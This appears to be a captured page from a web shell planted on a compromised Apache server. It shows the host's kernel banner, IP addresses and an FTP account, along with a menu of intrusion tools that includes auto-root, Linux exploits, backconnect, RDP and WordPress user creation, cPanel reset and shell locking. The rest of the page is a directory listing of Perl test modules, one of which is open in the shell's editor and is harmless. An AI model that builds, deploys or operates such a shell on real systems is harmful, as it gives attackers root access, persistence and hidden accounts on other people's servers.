Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-namespace-clean /
t /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
Devel
[ DIR ]
drwxr-xr-x
CleaneeBridge.pm
199
B
-rw-r--r--
CleaneeBridgeDirect.pm
163
B
-rw-r--r--
CleaneeBridgeExplicit.pm
203
B
-rw-r--r--
CleaneeTarget.pm
386
B
-rw-r--r--
ExporterTest.pm
208
B
-rw-r--r--
FunctionWipeout.pm
177
B
-rw-r--r--
Inheritance.pm
265
B
-rw-r--r--
OtherTypes.pm
364
B
-rw-r--r--
SyntaxError.pm
61
B
-rw-r--r--
Unimport.pm
189
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CleaneeTarget.pm
package CleaneeTarget; use strict; use warnings; sub AWAY { 23 }; sub IGNORED { 27 }; use CleaneeBridge; sub NOTAWAY { 17 }; sub x_foo { 'XFOO' } sub x_bar { 'XBAR' } sub x_baz { 'XBAZ' } use CleaneeBridgeExplicit; sub d_foo { 7 } sub d_bar { 8 } sub d_baz { 9 } sub summary { [AWAY, IGNORED, NOTAWAY, x_foo, x_bar, x_baz, d_foo, d_bar, d_baz] } use CleaneeBridgeDirect; 1;
Close